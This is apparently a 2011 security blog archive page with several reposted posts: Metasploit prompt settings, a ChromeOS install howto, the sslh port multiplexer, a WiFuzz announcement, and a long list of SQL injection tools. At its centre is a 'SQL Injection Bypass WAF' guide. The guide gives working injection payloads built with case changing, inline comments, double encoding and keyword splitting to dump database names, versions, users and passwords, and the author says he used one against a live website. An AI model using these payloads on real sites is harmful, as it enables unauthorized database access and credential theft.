Jul 22, 2011

Metasploit Console Customizable Prompts

The Metasploit Console now supports customizable prompts similar to how bash has the PS1 variable. To set a custom prompt the setg command can be used to set the Prompt variable. For example:

msf > setg Prompt "%T - (Sessions: %S Jobs: %J) "
Thu Jul 21 02:25:43 -0400 2011 - (Sessions: 0 Jobs: 0) >

This command will result in the timestamp, session count and job counts to be displayed within the prompt. The following variables are available for customizable prompts:

Variables:
%T - Timestamp
%S - Session count
%J - Job count
%H - Hostname of the local machine
%U - Username of the user running msfconsole
%D - Current local directory
%L - Host to use for listeners (same as 0.0.0.0)

Timestamps:
Setting a timestamp will initially result in using the default ruby format.
ie. Thu Jul 21 02:25:27 -0400 2011. To alter the formatting of a timestamp
set the PromptTimeFormat variable. For a list of time format options check out the Time class documentation for the strftime function (http://www.ruby-doc.org/core/classes/Time.html#M000392). Here is an example of using the PromptTimeFormat variable to change the timestamp formatting.

setg PromptTimeFormat "%I:%H:%S"
PromptTimeFormat => %I:%H:%S
03:03:00

Additionally, the ending character of the prompt is also configurable. Set the PromptChar variable to change the ending character from the default '>' character.

msf > setg PromptChar "#"
msf #

Once a suitable prompt has been configured the save command will write the global setting to the config file.

setg Prompt "%cya%T%clr - %L (s:%red%S%clr j:%red%J%clr) msf "
Prompt => %T - %L (s:%S j:%J) msf
10:21:51 - 192.168.0.111 (s:0 j:0) msf > save
Saved configuration to: /Users/bannedit/.msf3/config




If you like my blog, Please Donate Me

SQL Injection Bypass WAF

Great article, the source is in the bottom of this post.


1)Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:

//, — , /**/, #, –+, — -, ;


2)Case Changing:

Some WAF’s will filter only lowercase attacks As we can see we can easily evade this by case changing:
Possible Regex filter:

/union\sselect/g
id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)


3)Inline Comments:

Some WAF’s filter key words like /union\sselect/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.
Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example, let’s pretend a site filters union,where, table_name, table_schema, =, and information_schema.. These are 3 statements we need to inject our target.
For this we would:


id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -

The above code would bypass the filter. Notice we can use “like” instead of “=”
Another way to use inline comemnts, when everything seems to fail you can try to through the application Firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()– -

The above code should bypass the Union+select filters even where common inline comments didn’t work itself

4)Buffer Overflow:/Unexpected input:

A lot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it’s job correctly, but when given a large amount of Data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36–+


This bypass above works. I myself just used this against a Web site recently.

5)Replaced keywords(preg_replace and/or WAF’s with the same action):

Sometimes and application will remove all of a keyword. For instance, let’s say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

id=1+UNIunionON+SeLselectECT+1,2,3–

As you can see once union+select has been removed our capital UNION+SELECT takes its place successfully injecting our query:

UNION+SELECT+1,2,3–


6)Character encoding:

Most WAF’s will decode and filter an applications input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once then filter while the Application will keep decoding the SQL statement executing our code.
Examples of double encoding:

id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users–+

Some examples of double encoding are:



Single Quote ' %u0027
                          %u02b9
                          %u02bc
                          %u02c8
                          %u2032
                          %uff07
                          %c0%27
                          %c0%a7
                         %e0%80%a7
 ______________________________
   White Space:    %u0020
                             %uff00
                             %c0%20
                             %c0%a0
                             %e0%80%a0
 _______________________________
  (                         %u0028
                            %uff08
                            %c0%28
                            %c0%a8
                            %e0%80%a8
_____________________________
 )                         %u0029
                           %uff09
                           %c0%29
                           %c0%a9
                           %e0%80%a9
______________________________

 

7)Putting it all together:

After bypassing a few WAF’s the task gets easier and easier, but here are some ways to find out how to bypass “your” targeted WAF:

7a)Breaking the SQL statement:

To find out exactly what’s filtered you need to break your own SQL syntax and check for keywords being filtered, seeing if the keyword is filtered alone or in the presence of other SQL keywords. For instance, if union+select is giving you a Forbidden or a Internal Server Error, try removing Union and seeing what happens with just Select and vice-versa

7b)Verbose Errors:

When breaking the SQL syntax you use the errors to guide you on just needs to be done for instance if we were injecting the broken syntax(Removed union to stop Forbidden errors):

id=1+Select+1,2,3–

And the error was something like:

Error at line 1 near \” \”+1,2,3–

We could gather that maybe the Word Select is being filtered out and replaced with white space. We could confirm this by injection something like:

sel%0bect+1,2,3

From there we would see if we can see a Select error. If we did a few more checks will give us a the answer we need to bypass this WAF. This is just one of many ways to break down the SQL syntax. You may have to keep breaking it, while bypassing different parts.

8)Advanced Bypassing Techniques:

As stated earlier once you have bypassed a few WAF’s it gets easier and easier and more and more FUN .When one finds himself running into a wall try going through all the miscreant characters to see what’s allowed and what’s not allowed. These characters can be: [;:{}()*&$/|<>?"'] We can use these characters to possibly craft a working SQL exploit. For instance, during a WAF bypass I was doing everything was being either filtered or replaced. I noticed that all * were being replaced with whitespace which meant no inline comments. Union+select was also properly filtered to produce a Forbidden error. In this instance I was able to use the replaced * to craft my exploit like so:

id=1+uni*on+sel*ect+1,2,3–+

When the * were filtered out the union+select fell right into place. Now, UNunionION+SELselectECT wasn’t working because union and select were not being replaced only * was. This is a common WAF bypass. Find the replaceable character and you find the exploit.
Some other bypasses:

id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only


As of MySQL 4.0 it is said that Uni/**/on+Sel/**/ect will not work for bypass, but if the application firewall was customized to Filter /**/ out to whitespace it will work no matter what the version.




If you like my blog, Please Donate Me

Jul 21, 2011

Damn Small SQLi Scanner [DSSS]

Damn Small SQLi Scanner(DSSS) has been made as a PoC where I wanted to show that commercial (SQLi) scanners can be beaten under 100 lines of code. It supports blind/error  SQLi tests, depth 1 crawling and advanced comparison of different response attributes to distinguish blind responses. If you are satisfied with your commercial tool scanning results then I believe that you could even be more satisfied with this one. Currently only GET parameters are supported as of code line restrictions.


Dowload with: git clone https://github.com/stamparm/DSSS/
Source: https://github.com/stamparm/DSSS/

If you like my blog, Please Donate Me
One Dollar $1.00

Howto: Install Chrome OS on Macbook AIR

  1. Download the install image from here
  2. Extract the archive using your decompression tool of choice (The Unarchiver for Mac works great)
  3. Burn the image to a USB stick using dd (check the wiki if you need help with this, same as Flow/Vanilla instructions)
  4. Insert both this USB stick and the OS X install drive into your Macbook Air while it’s switched off
  5. Hold the “C” key down and press the power button, you can let go of the “C” key once the Apple logo appears
  6. Once the language selection screen appears, pick the appropriate option and click next
  7. Once the install wizard appears, click Utilities on the bar at the top, and then Terminal
  8. Type the following command without quotes: “umount /dev/disk*”
  9. Type the following command without quotes: “dd if=/dev/rdisk1 of=/dev/rdisk0 bs=4m count=512″
  10. Type the following command without quotes: “bless –device /dev/disk0s2 –setBoot –legacy”
  11. Once it says it’s finished (basically when it says X bytes copied in Y seconds), hold down the power button until your machine switches off
  12. Remove both your USB stick and the OS X install drive
  13. Hit the power button, wait about 22 seconds
Source: http://hexxeh.net/?p=328117760

If you like my blog, Please Donate Me
One Dollar $1.00

Jul 20, 2011

Wifuzz-"Smashing APs for fun & profit "

WiFuzz is a 802.11 fuzzer to trigger corner-case situations in the network stack of today's Access Points.


Source: http://code.google.com/p/wifuzz/wiki/WiFuzz

If you like my blog, Please Donate Me
One Dollar $1.00

Jul 19, 2011

SQL Injection Tools List

Supports only Microsoft SQL Server.

sqlmap ( http://sqlmap.sourceforge.net/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.


Pangolin 3.2.3 free edition ( http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip )
Your web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.


Havij v1.14 Advanced SQL Injection – free version ( http://www.itsecteam.com/files/havij/Havij1.14Free.rar )

SQL Power Injector ( http://www.sqlpowerinjector.com/ )
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.


SQLIer 0.8.2b  ( http://bcable.net/releases.php?sqlier )
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can’t guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.


bsqlbf-v2 ( http://code.google.com/p/bsqlbf-v2/ )
Supports: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.


Marathon Tool ( http://www.codeplex.com/marathontool )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.


Absinthe ( http://www.0×90.org/…inthe/index.php )
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.


pysqlin ( http://code.google.c…source/checkout )
Implemented: Oracle, MySQL and Microsoft SQL Server.


BSQL Hacker ( http://labs.portcull…on/bsql-hacker/ )
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.


SQID ( http://sqid.rubyforge.org/#download)
SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities


WITOOL ( http://witool.sourceforge.nSQL, Oracle, Microsoft SQL Server and Microsoft Access.et/ )
Implemented: Oracle and Microsoft SQL Server.


sqlus ( http://sqlsus.sourceforge.net/ )
Supports only MySQL.


DarkMySQLi16.py ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.


mySQLenum ( http://sourceforge.n…ects/mysqlenum/ )
Supports only MySQL.


PRIAMOS ( http://www.priamos-project.com/ )
Supports only Microsoft SQL Server.


FJ-Injector Framework ( http://sourceforge.net/projects/injection-fwk/files/)
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation


SFX-SQLi ( http://www.kachakil.com/ )
Supports only Microsoft SQL Server.


DarkMySQL ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.


ProMSiD Premium ( http://forum.web-def…02&postcount=15 )
Supports only MySQL.


Acunetix WVS  ( http://www.acunetix.com/vulnerability-scanner/download.htm)
Automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.


yInjector ( http://y-osirys.com/…-softwares/id10 )
Supports only MySQL.


Bobcat SQL Injection Tool ( http://www.northern-…pub/bobcat.html )
Safe3 Sql Injector ( http://sourceforge.net/projects/safe3si/)
Supports: http, https website, Basic, Digest, NTLM http authentications,GET, Post, Cookie sql injection.
Databases: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
SQL injection techniques: blind, error-based, UNION query and force guess.


ExploitMyUnion ( http://sourceforge.n…exploitmyunion/ )

Laudanum ( http://sourceforge.n…jects/laudanum/ )

Hexjector ( http://sourceforge.n…ects/hexjector/ )

WebRaider ( http://code.google.com/p/webraider/ )
Supports only Microsoft SQL Server.  Designed to execute commands on the server (reverse shell).

Toolza 1.0 ( http://bug-track.ru/prog/toolza1.0.rar )
SQL injection supported DB: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird / Interbase



Source: http://www.coresec.org/2011/07/18/sql-injection-scanners/

If you like my blog, Please Donate Me

Jul 18, 2011

SSLH = HTTPS, SSH, and OpenVPN on the same port.

What is it?

sslh accepts HTTPS, SSH and OpenVPN connections on the same port. This makes it possible to connect to an SSH server or an OpenVPN on port 443 (e.g. from inside a corporate firewall, which almost never block port 443) while still serving HTTPS on that port.

Inspiration

This feature has already been implemented as a Perl script.
There are two problems with sslh:
  • It's in Perl. That means it's pretty RAM hungry, and probably not very fast.
  • It doesn't manage privilege dropping, which is rather questionnable.
The obvious solution to both problems was to re-implement it in C, which is what this program is about.

Install me!

sslh has been packaged for Debian, Gentoo, FreeBSD and some other operating systems, so check out your favourite package repository first before installing by hand.
It should also work under Windows with Cygwin.

Source: http://www.rutschle.net/tech/sslh.shtml


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |